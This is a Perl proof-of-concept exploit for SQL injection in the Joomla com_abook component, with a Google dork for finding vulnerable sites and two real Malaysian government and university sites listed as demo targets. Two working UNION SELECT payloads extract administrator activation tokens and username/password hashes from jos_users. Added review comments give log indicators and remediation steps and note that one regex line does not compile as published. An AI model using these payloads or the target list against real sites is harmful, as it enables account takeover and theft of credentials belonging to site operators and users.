###
# Title : Exploit Joomla com_abook SQL Injection
# Author : Dz MinD Injector
# Home : Algeria 23000 d^_^b
# FaCeb0ok : https://www.facebook.com/Dz.MinD.Injector
# Type : proof of concept
# Tested on : Windows7 & Linux
# Date : 24/01/2016
# Vendor Homepage : www.joomla.com
###
# <?php
# echo " Freedom t0 Palastine " ;
# ?>
# Lov3 Explo8ting Just For Fun !
######## [ Proof / Exploit ] ################|=>
#! Google Dork :
#+ inurl:/index.php?option=com_abook
# Demo :
http://www.luas.gov.my/
http://www.unisza.edu.my/perpustakaan/
#!/usr/bin/perl
use IO::Socket::INET;
use LWP::UserAgent;
# Clear the terminal, then emit the tool banner one line at a time.
# system() is called with a single fixed string, so no user input reaches the shell here.
system("clear");
print $_ for (
    "------------------------------------------------------------------------\n",
    "########################################################################\n",
    "# Joomla com_abook Remote Sql Injection #\n",
    "# #\n",
    "# Author: Dz MinD Injector #\n",
    "# #\n",
    "# Greetz: Sige-Dz & Anon Jok & All Algerian HackerZ #\n",
    "########################################################################\n",
    "------------------------------------------------------------------------\n\n",
);
# Positional arguments: the base URL to test, then the method number (1 or 2).
# Both stay package globals because the rest of the script reads them.
($target, $component) = @ARGV[0, 1];

# Both arguments are required. Neither is validated beyond being non-empty:
# the target is later concatenated into the request URL as given.
if (!($target ne '' && $component ne ''))
{
    print
        "Usage: ./exploit.pl <target> <Method Number> \n",
        "-----------------------------------\n",
        " Available Methods : \n",
        " 1- Get Activation Token Admin \n",
        " 2- Admin Hash \n",
        "-----------------------------------\n",
        " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
    exit(1);
}
# Creates or truncates contents11.txt in the working directory. The result of
# open is not checked, and nothing in the code shown writes to or closes FILE.
open(FILE, "> contents11.txt");
# NOTE(review): the pattern on the next line does not parse as published (it
# looks like an extraction artefact), so the script does not compile as shown.
# The visible intent is to prefix the target with "http://" when the argument
# lacks it.
if($target !~ /http:///)
{
$target = "http://$target";
}
# Perl's built-in sleep takes whole seconds, so the fractional part is dropped.
sleep 1.5;
# HTTP client shared by both methods.
$agent = LWP::UserAgent->new();
# Every request carries this fixed, dated browser User-Agent. For defenders it
# is a weak log indicator on its own; it is more useful when it coincides with
# an option=com_abook request containing SQL keywords in the query string.
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
# Method 1: issues a single GET request carrying a UNION-based SQL injection
# payload, then searches the response body for a 32-hex-digit string.
#
# What the request shows (useful for detection and triage):
#  - The payload is appended to the last query parameter (Itemid as written) of
#    index.php?option=com_abook&view=author.
#  - It selects version() and group_concat(activation,0x3a) from jos_users, so
#    it assumes the "jos_" table prefix and a 32-column result set.
#  - Log/WAF indicators: option=com_abook together with UNION, SELECT,
#    group_concat, jos_users and "/**/" comment padding in the query string.
#
# NOTE(review): the component's source is not shown here; presumably a request
# parameter reaches a SQL statement without integer casting or parameter
# binding. The page names no affected or fixed com_abook version, so check the
# extension vendor's advisories; update or remove the component if it is
# installed.
if($component == 1)
{
$host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(activation,0x3a), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
print " . . Try to fond Activation Token Admin .. from $target . . \n\n";
sleep 1;
# The HTTP status is not checked; the body is used whatever the response was.
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
# Any run of 32 hex digits anywhere in the body matches, so a "[+]" line does
# not by itself show that the injection succeeded or that the value is an
# activation token. Confirm against server-side logs before acting on it.
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Activation Token Admin Injected d^_^b --> $password
.\n\n";
sleep 1;
}
else
{
print "[-] Activation Token Admin not found T_T
. \n\n";
}
}
# Method 2: same request shape as method 1, but the injected SELECT asks for
# group_concat(username,0x3a,password) from jos_users.
#
# Defensive notes:
#  - Log/WAF indicators are the same: option=com_abook with UNION, SELECT,
#    group_concat, jos_users and "/**/" padding in the query string.
#  - If web logs show such a request answered with a normal page, treat the
#    site's account password hashes as exposed: reset administrator passwords,
#    review accounts and sessions, and update or remove the component.
#  - The hard-coded jos_users table name means the query only fits sites that
#    use the "jos_" table prefix.
if($component == 2)
{
$host = $target . "index.php?option=com_abook&view=author&id=112&Itemid=409/**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(),/**/ 4, /**/ group_concat(username,0x3a,password), /**/ 6, /**/ 7, /**/ 8, /**/ 9,/**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18,/**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--";
print " . . Retrieving Databasee... from $target . . \n\n";
sleep 1;
# The HTTP status is not checked; the body is used whatever the response was.
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
# Only the first run of 32 hex digits is captured; the username requested in
# the query is not extracted. Any unrelated 32-hex string in the page would also
# match, so neither the "[+]" nor the "not vulnerable" message is a reliable
# verdict on whether the site is affected.
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Admin Hash d^_^b :
--> $password
.\n\n";
sleep 1;
}
else
{
print "[-] i'm Sorry traget not vulnerable T_T
. \n\n";
}
}